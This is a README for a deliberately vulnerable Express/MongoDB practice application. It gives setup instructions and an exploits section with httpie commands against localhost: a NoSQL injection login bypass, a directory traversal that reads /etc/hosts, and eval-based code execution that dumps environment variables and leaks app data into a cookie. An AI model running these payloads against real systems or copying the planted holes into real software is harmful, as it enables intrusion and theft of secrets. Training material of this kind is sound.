NodeJS Tarpit

An ExpressJS (tarpit) application using mongoDB.

I am using httpie, an alternative to curl to trigger exploits.

Getting started

🤞🤞🤞 I hope all goes as smooth as possible

Pre-requisites (Running without docker)

• NodeJS Get the latest version
• MongoDB Community Edition Install Mongodb Community Edition and run setup provided in documentation

Pre-requisites (Running with docker)

• Docker
• Run the command make start

Setup (if not using docker)

start mongoDB server (sudo mongod) start mongoDB client (mongo) Insert user rows using the query

node db-init.js

Installation (if not using docker)

Run npm install to install all dependencies for the project to run

Run Application (if not using docker)

Run npm run server to start the application and you will provided a local address to open in browser

Exploits

No SQL Injection

Login can be exploited with the following query as the username and password are not validated

http  --print=HB POST http://localhost:8089/api/v1/login username:='{"$gt": ""}' password:='{"$gt": ""}'

Directory Traversal Vulnerability

Can get access to any file on the server using the command

http GET http://localhost:8089/api/v1/image-lookup image=="/etc/hosts"

Remote Code Execution

RCE exploting eval on server

http GET http://localhost:8089/user-input userInput=="console.log(process.env)"

Injecting script onto user browser

http GET http://localhost:8089/user-input userInput=="alert('You system is under our control now.')"

Can exploit the whole server by injecting something like the code below (https://medium.com/lift-security/in-memory-backdoor-for-node-js-express-apps-2a3f4301925b)

http GET http://localhost:8089/user-input userInput=="res.cookie('appLocals',JSON.stringify(req.app.locals))"

Vulnerabilities

• directory traversal
• nosql injection
• remote code execution: UserInput
• sensitive data leak
• insider attack
• business logic flaw
• business logic flaw
• hard coded credentials